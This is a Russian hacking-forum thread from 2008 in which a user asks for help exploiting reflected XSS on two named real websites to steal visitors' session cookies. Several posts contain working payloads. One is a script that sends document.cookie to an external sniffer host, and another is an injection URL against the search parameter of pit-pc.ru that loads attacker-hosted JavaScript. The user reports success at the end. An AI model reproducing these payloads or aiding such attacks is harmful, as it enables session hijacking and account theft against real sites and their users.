Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Помогите разобраться с Xss |
02.05.2008, 16:27
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733
Репутация:
46
|
|
Помогите разобраться с Xss
Здравствуйте, товарисчи!
Помогите плз разобраться с XSS. Перечитал по инета... Не работает.
Значит проблема такова: нашел я туеву хучу сайтов с пассивными xss. Алерт есть, вроде нихрена не фильтруется...
Вот пару сайтов.
www.pit-pc.ru
www.softoman.ru
Зарегил сниффер на s.netsec.ru. Логин у меня там nick_314
составил соотв. запрос
<script>img = new Image(); img.src = "http://s.netsec.ru/Nick_314.gif?"+document.cookie;</script>
Сам перехожу по ссылке... По идее должен переходить мой sess_id, а вот хрен. Не пашет...
Переводил в char - не приходит... Просвятите ламера, что не так?
|
|
|
02.05.2008, 16:37
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733
Репутация:
46
|
|
Извините, перепутал раздел... Переместите , пожалуйста.
|
|
|
|
04.05.2008, 19:02
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
допустим на pit-pc.ru фильтурет ковычки....
сделай проще
http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://твойсайт.ru/js.js></SCRIPT>
где содержание js.js
допустим такое
Код:
img = new Image(); img.src = "http://s.netsec.ru/nick_314.gif?"+document.cookie;
|
|
|
|
04.05.2008, 19:13
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
Сообщение от DimOnOID
допустим на pit-pc.ru фильтурет ковычки....
Сообщение от DimOnOID
http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://твойсайт.ru/js.js></SCRIPT>
Ты странный  ...
searchstring= "><
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
04.05.2008, 20:00
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
в код глянь...=\
|
|
|
|
04.05.2008, 22:40
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733
Репутация:
46
|
|
Спасибо большое, сейчас попробую.
|
|
|
|
04.05.2008, 23:15
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733
Репутация:
46
|
|
Значит попробовал. Результат - ноль...
ЗАрегился я по-быстренькому на Holm.ru
http://www.angryhacker.h18.ru
Залил Js.js
img = new Image(); img.src = "http://s.netsec.ru/nick_314.gif?"+document.cookie;
Делаю соотв. запрос
http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://www.angryhacker.h18.ru/js.js></SCRIPT>
Не работает. Грешу на holm.ru...
Последний раз редактировалось AARON; 04.05.2008 в 23:18..
|
|
|
|
05.05.2008, 00:14
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Nick_314 - с большой или маленькой буквы? Просто захожу на http://s.netsec.ru/nick_314.gif - там ничего нет.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
05.05.2008, 00:50
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Проверь ещё раз всё хорошенько)..всё должно работать)......ну на крайний зарегай на tu1.ru ) |
|
|
|
06.05.2008, 15:08
|
|
Участник форума
Регистрация: 29.04.2008
Сообщений: 106
Провел на форуме:
647733
Репутация:
46
|
|
Все, разобрался. Теперь работает. Как выяснилось, логин nick_314 почему-то не работал... Я просто зарегил новый и теперь все тип-топ!
Спасибо за помошь, можно закрывать.
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
